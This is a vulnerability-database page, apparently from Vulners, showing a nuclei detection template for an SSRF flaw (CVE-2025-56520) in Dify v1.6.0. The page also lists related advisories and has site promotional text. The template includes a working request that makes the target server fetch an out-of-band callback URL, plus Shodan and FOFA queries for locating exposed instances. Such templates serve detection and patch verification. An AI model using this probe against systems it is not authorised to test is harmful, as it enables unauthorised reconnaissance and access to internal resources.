Lucene search
K

Dify v1.6.0 - Server-Side Request Forgery

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 41 Views

Dify v1.6.0 SSRF in RemoteFileUploadApi allows arbitrary server requests; update to latest.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-56520
20 Jan 202604:04
circl
CNNVD
dify 安全漏洞
30 Sep 202500:00
cnnvd
CVE
CVE-2025-56520
30 Sep 202500:00
cve
Cvelist
CVE-2025-56520
30 Sep 202500:00
cvelist
EUVD
EUVD-2025-31756
3 Oct 202520:07
euvd
NVD
CVE-2025-56520
30 Sep 202517:15
nvd
Positive Technologies
PT-2025-40009
30 Sep 202500:00
ptsecurity
RedhatCVE
CVE-2025-56520
1 Oct 202500:42
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2025-56520
11 Feb 202600:00
vulncheck_kev
Vulnrichment
CVE-2025-56520
30 Sep 202500:00
vulnrichment
Rows per page
id: CVE-2025-56520

info:
  name: Dify v1.6.0 - Server-Side Request Forgery
  author: 0x_Akoko
  severity: high
  description: |
    Dify v1.6.0 contains a server side request forgery caused by improper validation in controllers.console.remote_files.RemoteFileUploadApi, letting attackers make arbitrary requests from the server, exploit requires network access.
  impact: |
    Attackers can make arbitrary requests from the server, potentially accessing internal resources or sensitive data.
  remediation: |
    Update to the latest version.
  reference:
    - https://github.com/langgenius/dify
    - https://dify.ai/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 9.3
    cve-id: CVE-2025-56520
    epss-score: 0.00649
    epss-percentile: 0.46585
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"Dify"
    fofa-query: title="Dify"
  tags: cve,cve2025,dify,ssrf,oast,oob,oss,vkev

http:
  - raw:
      - |
        GET /console/api/remote-files/http%3A%2F%2F{{interactsh-url}}%2Ftest HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "file_type"
          - "file_length"
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: word
        part: interactsh_protocol
        words:
          - "http"
          - "dns"
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100fe7ca26000198300a3b5274e2414f8bac6dea38af82dd31a5108e859961a4b2502207c50e9b06b17384d2c361ee56e4dacbf2f59d7f4ed9da719e72cc652061653bc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.15.3
EPSS0.00649
SSVC
41